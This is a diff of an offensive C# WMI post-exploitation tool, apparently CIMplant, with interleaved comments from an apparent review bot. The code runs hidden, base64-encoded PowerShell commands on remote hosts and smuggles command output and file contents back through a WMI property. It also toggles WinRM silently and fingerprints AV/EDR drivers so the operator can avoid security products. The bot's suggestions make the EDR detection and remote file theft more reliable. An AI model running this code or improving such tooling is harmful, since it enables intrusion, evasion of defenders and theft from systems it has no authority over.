= (" + command + " | Out-String).Trim()"; - const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, 
false); - powershell.Commands.AddScript(command3, false); - // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time - if (noDebugCheck) + if (powershell.Runspace.ConnectionInfo != null) { - // start the timer and get a timeout - DateTime startTime = DateTime.Now; - IAsyncResult asyncPs = powershell.BeginInvoke(); + string command1 = "$data = (" + command + " | Out-String).Trim()"; + const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - while (asyncPs.IsCompleted == false) + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + + // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time + if (noDebugCheck) { - //Console.WriteLine("Waiting for pipeline to finish..."); - Thread.Sleep(5000); + // start the timer and get a timeout + DateTime startTime = DateTime.Now; + IAsyncResult asyncPs = powershell.BeginInvoke(); - // Check on our timeout here - TimeSpan elasped = DateTime.Now.Subtract(startTime); - if (elasped > timeout) - break; - } + while (asyncPs.IsCompleted == false) + { + //Console.WriteLine("Waiting for pipeline to finish..."); + Thread.Sleep(5000); - //powershell.EndInvoke(asyncPs); + // Check on our timeout here + TimeSpan elasped = DateTime.Now.Subtract(startTime); + if (elasped > timeout) + break; + } + + //powershell.EndInvoke(asyncPs); + } + else + { + powershell.Invoke(); + } } else - { - powershell.Invoke(); - } + wsman = false; } - else - wsman = false; } - } - GetOut: - if (wsman == false) - { - if (string.IsNullOrEmpty(planter.System?.ToString())) + GetOut: + if (wsman == false) { - try + if (string.IsNullOrEmpty(planter.System?.ToString())) { - ProcessStartInfo procStartInfo = new 
ProcessStartInfo("cmd", "/c " + command) + try { - RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true - }; - - Process proc = new Process {StartInfo = procStartInfo}; - proc.Start(); + ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + { + RedirectStandardOutput = true, + UseShellExecute = false, + CreateNoWindow = true + }; + + Process proc = new Process { StartInfo = procStartInfo }; + proc.Start(); + + // Get the output into a string + string result = proc.StandardOutput.ReadToEnd(); + // Display the command output. + Console.WriteLine(result); + } + catch (Exception e) + { + Console.WriteLine(e); + } - // Get the output into a string - string result = proc.StandardOutput.ReadToEnd(); - // Display the command output. - Console.WriteLine(result); + return true; } - catch (Exception e) + + + // Create the parameters and create the new process. Broken out to make it easier to follow what's up + string encodedCommand = "$data = (" + command + + " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string fullCommand = "powershell -enc " + encodedCommandB64; + + CimMethodParametersCollection cimParams = new CimMethodParametersCollection + { + CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In) + }; + + if (noDebugCheck) { - Console.WriteLine(e); + // operation options for timeout + CimOperationOptions operationOptions = new CimOperationOptions + { + Timeout = TimeSpan.FromMilliseconds(10000), + }; + + // Let's create a new instance + CimInstance cimInstance = new CimInstance("Win32_Process"); + cimSession.InvokeMethod(Namespace, cimInstance, "Create", cimParams, operationOptions); + Thread.Sleep(20000); } - return true; + else + cimSession.InvokeMethod(new CimInstance("Win32_Process", 
Namespace), "Create", cimParams); } + // Give it a second to write + Thread.Sleep(1000); - // Create the parameters and create the new process. Broken out to make it easier to follow what's up - string encodedCommand = "$data = (" + command + - " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - string fullCommand = "powershell -enc " + encodedCommandB64; - CimMethodParametersCollection cimParams = new CimMethodParametersCollection - { - CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In) - }; + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); - if (noDebugCheck) + if (!noDebugCheck) { - // operation options for timeout - CimOperationOptions operationOptions = new CimOperationOptions + CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); + + //Get the contents of the file in the DebugFilePath prop + string[] commandOutput = GetOsRecovery(cimSession).Split(','); + StringBuilder output = new StringBuilder(); + + //Print output. 
+ foreach (string integer in commandOutput) { - Timeout = TimeSpan.FromMilliseconds(10000), - }; + try + { + char a = (char)Convert.ToInt32(integer); + output.Append(a); + } + catch + { + //pass + } + } - // Let's create a new instance - CimInstance cimInstance = new CimInstance("Win32_Process"); - cimSession.InvokeMethod(Namespace, cimInstance, "Create", cimParams, operationOptions); - Thread.Sleep(20000); + Console.WriteLine(output); } - else - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - } - - // Give it a second to write - Thread.Sleep(1000); + Console.WriteLine("New process spawned, not checking for output"); + SetOsRecovery(cimSession, originalWmiProperty); - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); + } - if (!noDebugCheck) + else { - CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); - - //Get the contents of the file in the DebugFilePath prop - string[] commandOutput = GetOsRecovery(cimSession).Split(','); - StringBuilder output = new StringBuilder(); + Console.WriteLine("Shhh...Not using PS"); - //Print output. - foreach (string integer in commandOutput) - { - try - { - char a = (char) Convert.ToInt32(integer); - output.Append(a); - } - catch + // Create the parameters and create the new process. + CimMethodParametersCollection cimParams = new CimMethodParametersCollection { - //pass - } - } + CimMethodParameter.Create("CommandLine", planter.Commander.Execute, CimFlags.In) + }; - Console.WriteLine(output); - } - else - Console.WriteLine("New process spawned, not checking for output"); + CimMethodResult results = cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - SetOsRecovery(cimSession, originalWmiProperty); + Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 + ? "Successfully created process" + : "Issues creating process"); + } return true; } 
@@ -1006,50 +1329,64 @@ public object disable_winrm(Planter planter) { CimSession cimSession = planter.Connector.ConnectedCimSession; - // Create the parameters and create the new process. - CimMethodParametersCollection cimParams = new CimMethodParametersCollection + if (!planter.Commander.NoPS) { - CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Disable-PSRemoting -Force\"", - CimFlags.In) - }; - - // We only need the first instance - CimMethodResult results = - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + // Create the parameters and create the new process. + CimMethodParametersCollection cimParams = new CimMethodParametersCollection + { + CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Disable-PSRemoting -Force\"", + CimFlags.In) + }; - // Give it a second to write - Thread.Sleep(1000); + // We only need the first instance + CimMethodResult results = + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 - ? "Successfully disabled WinRM" - : "Issues disabling WinRM"); + // Give it a second to write + Thread.Sleep(1000); - return true; + Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 + ? "Successfully disabled WinRM" + : "Issues disabling WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object enable_winrm(Planter planter) { CimSession cimSession = planter.Connector.ConnectedCimSession; - // Create the parameters and create the new process. 
- CimMethodParametersCollection cimParams = new CimMethodParametersCollection + if (!planter.Commander.NoPS) { - CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Enable-PSRemoting -Force\"", - CimFlags.In) - }; - - // We only need the first instance - CimMethodResult results = - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + // Create the parameters and create the new process. + CimMethodParametersCollection cimParams = new CimMethodParametersCollection + { + CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Enable-PSRemoting -Force\"", + CimFlags.In) + }; - // Give it a second to write - Thread.Sleep(1000); + // We only need the first instance + CimMethodResult results = + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 - ? "Successfully enabled WinRM" - : "Issues enabled WinRM"); + // Give it a second to write + Thread.Sleep(1000); - return true; + Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 + ? "Successfully enabled WinRM" + : "Issues enabled WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object registry_mod(Planter planter) 
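Review bot: The `--nops` gates added to disable_winrm and enable_winrm return `null` when PowerShell is refused, while the identical gate added to download and upload in this same commit returns `true`, so a caller cannot consistently tell a refused action from a completed one. The gate is also the last branch of each function, nesting the whole body one level deeper; a guard at the top reads better and is one statement: `if (planter.Commander.NoPS) { Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); return null; }`. Note that the "Successfully disabled WinRM" message still reflects only `Win32_Process.Create`'s return value, i.e. that powershell.exe was spawned, not that `Disable-PSRemoting` succeeded; a comment such as `// ReturnValue 0 only means the process was created, not that the cmdlet succeeded` would stop readers treating it as a verified result.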
@@ -1655,23 +1992,48 @@ public object ps(Planter planter) const string query = "SELECT * FROM Win32_Process"; IEnumerable queryInstance = cimSession.QueryInstances(Namespace, "WQL", query); - Console.WriteLine("{0,-35}{1,15}", "Name", "Handle"); - Console.WriteLine("{0,-35}{1,15}", "-----------", "---------"); + Console.WriteLine("{0,-50}{1,15}", "Name", "Handle"); + Console.WriteLine("{0,-50}{1,15}", "-----------", "---------"); foreach (CimInstance cimObject in queryInstance) { string name = cimObject.CimInstanceProperties["Name"].Value.ToString(); - if (name.Length > 30) - name = Truncate(name, 30) + "..."; + if (name.Length > 45) + name = Truncate(name, 45) + "..."; try { - Console.WriteLine("{0,-35}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + if (Messenger.AVs.Any(name.ToLower().Equals)) + { + // Make AV/EDR pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Red; + Console.WriteLine("{0,-50}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + Console.ResetColor(); + } + } + else if (Messenger.Admin.Any(name.ToLower().Equals)) + { + // Make AV/EDR pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Cyan; + Console.WriteLine("{0,-35}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + Console.ResetColor(); + } + } + else + Console.WriteLine("{0,-35}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + } catch { //value probably doesn't exist, so just pass } } + + Messenger.BlueMessage("\nDenotes a potential admin tool"); + Messenger.ErrorMessage("Denotes a potential AV/EDR product"); return queryInstance; } @@ -2033,11 +2395,6 @@ public int GetFileSize(string path, CimSession cimSession) return Convert.ToInt32(queryInstance.First().CimInstanceProperties["FileSize"].Value); } - - - - - public string CheckForFinishedDebugFilePath(string originalWmiProperty, CimSession cimSession) { bool warn = false; 
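Review bot: When the console background is not black, the new AV and Admin branches in `ps` print nothing at all, so those processes silently vanish from the listing instead of merely losing their colour; the colour should be conditional but the `Console.WriteLine` unconditional. The column widths also drifted in this hunk: the header and the AV branch use `{0,-50}` while the Admin and default branches keep `{0,-35}`, so the Handle column no longer lines up, and `Any(name.ToLower().Equals)` is a culture-sensitive comparison where ordinal case-insensitive matching is what is meant. The `// Make AV/EDR pop` comment on the Admin branch is copy-pasted and should read `// Make admin tools pop`. The rewrite below assumes `Messenger.AVs` and `Messenger.Admin` are `IEnumerable<string>`, as the existing `.Any(...)` call suggests. The GetFileSize blank-line removal sharing this line needs no review.
```csharp
// … unchanged: name lookup and truncation …
ConsoleColor? highlight = null;
if (Messenger.AVs.Contains(name, StringComparer.OrdinalIgnoreCase))
    highlight = ConsoleColor.Red;      // potential AV/EDR product
else if (Messenger.Admin.Contains(name, StringComparer.OrdinalIgnoreCase))
    highlight = ConsoleColor.Cyan;     // potential admin tool

// Colour only when it will be visible, but always print the row
if (highlight.HasValue && Console.BackgroundColor == ConsoleColor.Black)
    Console.ForegroundColor = highlight.Value;
Console.WriteLine("{0,-50}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value);
Console.ResetColor();
```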
diff --git a/CIMplant/ExecuteWMI.cs b/CIMplant/ExecuteWMI.cs old mode 100755 new mode 100644 index ea8ffc6..fab87ae --- a/CIMplant/ExecuteWMI.cs +++ b/CIMplant/ExecuteWMI.cs 
@@ -301,10 +301,296 @@ public object vacant_system(Planter planter) return queryCollection; } + // Idea and some code thanks to Harley - https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cna + public object edr_query(Planter planter) + { + ManagementScope scope = planter.Connector.ConnectedWmiSession; + bool activeEdr = false; + + ObjectQuery fileQuery = new ObjectQuery(@"SELECT * FROM CIM_DataFile WHERE Path = '\\windows\\System32\\drivers\\'"); + ManagementObjectSearcher fileSearcher = new ManagementObjectSearcher(scope, fileQuery); + ManagementObjectCollection queryCollection = fileSearcher.Get(); + + foreach (var o in queryCollection) + { + var wmiObject = (ManagementObject)o; + string fileName = Path.GetFileName((string)wmiObject["Name"]); + + switch (fileName) + { + case "FeKern.sys": + case "WFP_MRT.sys": + Messenger.ErrorMessage("FireEye Found!"); + activeEdr = true; + break; + + case "eaw.sys": + Messenger.ErrorMessage("Raytheon Cyber Solutions Found!"); + activeEdr = true; + break; + + case "rvsavd.sys": + Messenger.ErrorMessage("CJSC Returnil Software Found!"); + activeEdr = true; + break; + + case "dgdmk.sys": + Messenger.ErrorMessage("Verdasys Inc. 
Found!"); + activeEdr = true; + break; + + case "atrsdfw.sys": + Messenger.ErrorMessage("Altiris (Symantec) Found!"); + activeEdr = true; + break; + + case "mbamwatchdog.sys": + Messenger.ErrorMessage("Malwarebytes Found!"); + activeEdr = true; + break; + + case "edevmon.sys": + case "ehdrv.sys": + Messenger.ErrorMessage("ESET Found!"); + activeEdr = true; + break; + + case "SentinelMonitor.sys": + Messenger.ErrorMessage("SentinelOne Found!"); + activeEdr = true; + break; + + case "edrsensor.sys": + case "hbflt.sys": + case "bdsvm.sys": + case "gzflt.sys": + case "bddevflt.sys": + case "AVCKF.SYS": + case "Atc.sys": + case "AVC3.SYS": + case "TRUFOS.SYS": + case "BDSandBox.sys": + Messenger.ErrorMessage("BitDefender Found!"); + activeEdr = true; + break; + + case "HexisFSMonitor.sys": + Messenger.ErrorMessage("Hexis Cyber Solutions Found!"); + activeEdr = true; + break; + + case "CyOptics.sys": + case "CyProtectDrv32.sys": + case "CyProtectDrv64.sys": + Messenger.ErrorMessage("Cylance Inc. 
Found!"); + activeEdr = true; + break; + + case "aswSP.sys": + Messenger.ErrorMessage("Avast Found!"); + activeEdr = true; + break; + + case "mfeaskm.sys": + case "mfencfilter.sys": + case "epdrv.sys": + case "mfencoas.sys": + case "mfehidk.sys": + case "swin.sys": + case "hdlpflt.sys": + case "mfprom.sys": + case "MfeEEFF.sys": + Messenger.ErrorMessage("McAfee Found!"); + activeEdr = true; + break; + + case "groundling32.sys": + case "groundling64.sys": + Messenger.ErrorMessage("Dell Secureworks Found!"); + activeEdr = true; + break; + + case "avgtpx86.sys": + case "avgtpx64.sys": + Messenger.ErrorMessage("AVG Technologies Found!"); + activeEdr = true; + break; + + case "pgpwdefs.sys": + case "GEProtection.sys": + case "diflt.sys": + case "sysMon.sys": + case "ssrfsf.sys": + case "emxdrv2.sys": + case "reghook.sys": + case "spbbcdrv.sys": + case "bhdrvx86.sys": + case "bhdrvx64.sys": + case "SISIPSFileFilter.sys": + case "symevent.sys": + case "vxfsrep.sys": + case "VirtFile.sys": + case "SymAFR.sys": + case "symefasi.sys": + case "symefa.sys": + case "symefa64.sys": + case "SymHsm.sys": + case "evmf.sys": + case "GEFCMP.sys": + case "VFSEnc.sys": + case "pgpfs.sys": + case "fencry.sys": + case "symrg.sys": + Messenger.ErrorMessage("Symantec Found!"); + activeEdr = true; + break; + + case "SAFE-Agent.sys": + Messenger.ErrorMessage("SAFE-Cyberdefense Found!"); + activeEdr = true; + break; + + case "CybKernelTracker.sys": + Messenger.ErrorMessage("CyberArk Software Found!"); + activeEdr = true; + break; + + case "klifks.sys": + case "klifaa.sys": + case "Klifsm.sys": + Messenger.ErrorMessage("Kaspersky Found!"); + activeEdr = true; + break; + + case "SAVOnAccess.sys": + case "savonaccess.sys": + case "sld.sys": + Messenger.ErrorMessage("Sophos Found!"); + activeEdr = true; + break; + + case "ssfmonm.sys": + Messenger.ErrorMessage("Webroot Software, Inc. 
Found!"); + activeEdr = true; + break; + + case "CarbonBlackK.sys": + case "carbonblackk.sys": + case "Parity.sys": + case "cbk7.sys": + case "cbstream.sys": + Messenger.ErrorMessage("Carbon Black Found!"); + activeEdr = true; + break; + + case "CRExecPrev.sys": + Messenger.ErrorMessage("Cybereason Found!"); + activeEdr = true; + break; + + case "im.sys": + case "CSAgent.sys": + case "CSBoot.sys": + case "CSDeviceControl.sys": + case "cspcm2.sys": + Messenger.ErrorMessage("CrowdStrike Found!"); + activeEdr = true; + break; + + case "cfrmd.sys": + case "cmdccav.sys": + case "cmdguard.sys": + case "CmdMnEfs.sys": + case "MyDLPMF.sys": + Messenger.ErrorMessage("Comodo Security Solutions Found!"); + activeEdr = true; + break; + + case "PSINPROC.SYS": + case "PSINFILE.SYS": + case "amfsm.sys": + case "amm8660.sys": + case "amm6460.sys": + Messenger.ErrorMessage("Panda Security Found!"); + activeEdr = true; + break; + + case "fsgk.sys": + case "fsatp.sys": + case "fshs.sys": + Messenger.ErrorMessage("F-Secure Found!"); + activeEdr = true; + break; + + case "esensor.sys": + Messenger.ErrorMessage("Endgame Found!"); + activeEdr = true; + break; + + case "csacentr.sys": + case "csaenh.sys": + case "csareg.sys": + case "csascr.sys": + case "csaav.sys": + case "csaam.sys": + Messenger.ErrorMessage("Cisco Found!"); + activeEdr = true; + break; + + case "TMUMS.sys": + case "hfileflt.sys": + case "TMUMH.sys": + case "AcDriver.sys": + case "SakFile.sys": + case "SakMFile.sys": + case "fileflt.sys": + case "TmEsFlt.sys": + case "tmevtmgr.sys": + case "TmFileEncDmk.sys": + Messenger.ErrorMessage("Trend Micro Inc Found!"); + activeEdr = true; + break; + + case "epregflt.sys": + case "medlpflt.sys": + case "dsfa.sys": + case "cposfw.sys": + Messenger.ErrorMessage("Check Point Software Technologies Found!"); + activeEdr = true; + break; + + case "psepfilter.sys": + case "cve.sys": + Messenger.ErrorMessage("Absolute Found!"); + activeEdr = true; + break; + + case "brfilter.sys": + 
Messenger.ErrorMessage("Bromium Found!"); + activeEdr = true; + break; + + case "LRAgentMF.sys": + Messenger.ErrorMessage("LogRhythm Found!"); + activeEdr = true; + break; + + case "libwamf.sys": + Messenger.ErrorMessage("OPSWAT Inc Found!"); + activeEdr = true; + break; + } + } + + if (!activeEdr) + Console.WriteLine("No EDR vendors found, tread carefully"); + + return true; + } + /////////////////////////////////////// FILE OPERATIONS ///////////////////////////////////////////////////////////////////// - // WORKING CURRENTLY BUT WITH POWERSHELL :(// public object cat(Planter planter) { ManagementScope scope = planter.Connector.ConnectedWmiSession; 
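Review bot: The `switch (fileName)` in the new edr_query is an ordinal, case-sensitive match while NTFS file names are case-insensitive, so a driver stored on disk as `sentinelmonitor.sys` or `CSAGENT.SYS` is missed; the list already works around this by hand for Sophos and Carbon Black (`SAVOnAccess.sys`/`savonaccess.sys`, `CarbonBlackK.sys`/`carbonblackk.sys`). Switch on `fileName.ToLowerInvariant()` with lower-cased case labels, or replace the switch with a `Dictionary<string, string>` built with `StringComparer.OrdinalIgnoreCase`, which also removes the duplicate labels. The closing `"No EDR vendors found, tread carefully"` is stronger than the check supports, since only a fixed, vendor-curated driver list is consulted (Microsoft Defender, for instance, has no entry), so a comment such as `// Absence from this list is not absence of EDR; the list is curated and incomplete` or a softer message is warranted. The `(string)wmiObject["Name"]` cast will also throw if a row has a null Name, which would abort the whole scan rather than skip the row.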
@@ -316,92 +602,31 @@ public object cat(Planter planter) return null; } - string originalWmiProperty = GetOsRecovery(scope); - bool wsman = true; - Messenger.GoodMessage("[+] Printing file: " + path); Messenger.GoodMessage("--------------------------------------------------------\n"); - if (wsman == true) - { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) - { - try - { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - { - // Since we can't run a local runspace as admin let's just grab the file using normal c# code (pro: avoids PS) - //powershell.Runspace = RunspaceCreateLocal(); - // We might need to catch if people try to cat binary files in the future - Console.WriteLine(System.IO.File.ReadAllText(path)); - return true; - } - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) - { - wsman = false; - } - catch (UnauthorizedAccessException) - { - Messenger.ErrorMessage("[-] Error: Access to the file is denied. 
If running against the local system use Admin prompt."); - return null; - } - - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = (Get-Content " + path + " | Out-String).Trim()"; - const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); - } - else - wsman = false; - } - } - - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - - string encodedCommand = "$data = (Get-Content " + path + - " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - - inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - } - - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + // https://twitter.com/mattifestation/status/1220713684756049921 but modified :) + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath($"\\\\{planter.Connector.SystemToConn}\\root\\Microsoft\\Windows\\Powershellv3"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementObject newInstance = 
classInstance.CreateInstance(); + newInstance["InstanceID"] = path; + newInstance.Put(); - //Get the contents of the file in the DebugFilePath prop - string[] fileOutput = GetOsRecovery(scope).Split(','); + ManagementObjectSearcher searcher = + new ManagementObjectSearcher("root\\Microsoft\\Windows\\Powershellv3", + $"SELECT * FROM PS_ModuleFile WHERE InstanceID = {path}"); - StringBuilder output = new StringBuilder(); - - //Print file output. - foreach (string integer in fileOutput) + foreach (ManagementObject queryObj in searcher.Get()) { - char a = (char) Convert.ToInt32(integer); - output.Append(a); + if (queryObj["FileData"] == null) + return true; + else + { + Byte[] arrFileData = (Byte[])(queryObj["FileData"]); + Console.WriteLine(Encoding.UTF8.GetString(arrFileData, 0, arrFileData.Length)); + } } - - Console.WriteLine(output); - SetOsRecovery(scope, originalWmiProperty); - return true; } 
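Review bot: The new `ManagementObjectSearcher` in cat is built from the bare namespace string `root\Microsoft\Windows\Powershellv3` with no `ManagementScope`, so the PS_ModuleFile query runs against the local machine even though the instance was just created on `planter.Connector.SystemToConn`; a scope for the remote Powershellv3 namespace, built with the same connection options as `scope`, should be passed to the searcher. The WQL also interpolates `path` unquoted (`WHERE InstanceID = {path}`), which is not valid WQL for a string value and fails for any path with spaces; it should be `WHERE InstanceID = '{path.Replace(@"\", @"\\").Replace("'", "''")}'`, or the rows should be filtered in C# after a plain `SELECT * FROM PS_ModuleFile`. The `ManagementPath` handed to `ManagementClass` names only the namespace, not the `PS_ModuleFile` class, so it is unclear what `CreateInstance()` instantiates — worth confirming against the referenced technique. Finally, `if (queryObj["FileData"] == null) return true;` reports success for an unreadable file while the old `UnauthorizedAccessException` handling was dropped, so a null `FileData` should at least emit an error. The start of cat, including the `path` validation, is outside the hunk.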
@@ -469,93 +694,101 @@ public object download(Planter planter) Messenger.GoodMessage("[+] Downloading file: " + downloadPath); Messenger.GoodMessage("--------------------------------------------------------\n"); - - if (wsman == true) + + if (!planter.Commander.NoPS) { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - powershell.Runspace = RunspaceCreateLocal(); - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) - { - wsman = false; - } + try + { + if (!string.IsNullOrEmpty(planter.Password?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else + powershell.Runspace = RunspaceCreateLocal(); + } + catch (System.Management.Automation.Remoting.PSRemotingTransportException) + { + wsman = false; + } - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + "'"; - const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + if (powershell.Runspace.ConnectionInfo != null) + { + string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + "'"; + const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + + 
powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + } + else + wsman = false; } - else - wsman = false; } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + - "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - - string fullCommand = "powershell -enc " + encodedCommandB64; + string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + + "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - inParams["CommandLine"] = fullCommand; + string fullCommand = "powershell -enc " + encodedCommandB64; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + inParams["CommandLine"] = fullCommand; - } + ManagementBaseObject outParams = 
classInstance.InvokeMethod("Create", inParams, null); - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + } - //Get the contents of the file in the DebugFilePath prop - string[] fileOutput = GetOsRecovery(scope).Split(','); + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); + CheckForFinishedDebugFilePath(originalWmiProperty, scope); - //Create list for bytes - List outputList = new List(); + //Get the contents of the file in the DebugFilePath prop + string[] fileOutput = GetOsRecovery(scope).Split(','); - //Convert from int (bytes) to byte - foreach (string integer in fileOutput) - { - try - { - byte a = (byte) Convert.ToInt32(integer); - outputList.Add(a); - } - catch + //Create list for bytes + List outputList = new List(); + + //Convert from int (bytes) to byte + foreach (string integer in fileOutput) { - //pass + try + { + byte a = (byte)Convert.ToInt32(integer); + outputList.Add(a); + } + catch + { + //pass + } } - } - //Save to local dir if no directory specified - if (string.IsNullOrEmpty(writePath)) - writePath = Path.GetFileName(downloadPath); + //Save to local dir if no directory specified + if (string.IsNullOrEmpty(writePath)) + writePath = Path.GetFileName(downloadPath); - File.WriteAllBytes(writePath, outputList.ToArray()); + File.WriteAllBytes(writePath, outputList.ToArray()); + + SetOsRecovery(scope, originalWmiProperty); + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + } - SetOsRecovery(scope, originalWmiProperty); return true; } 
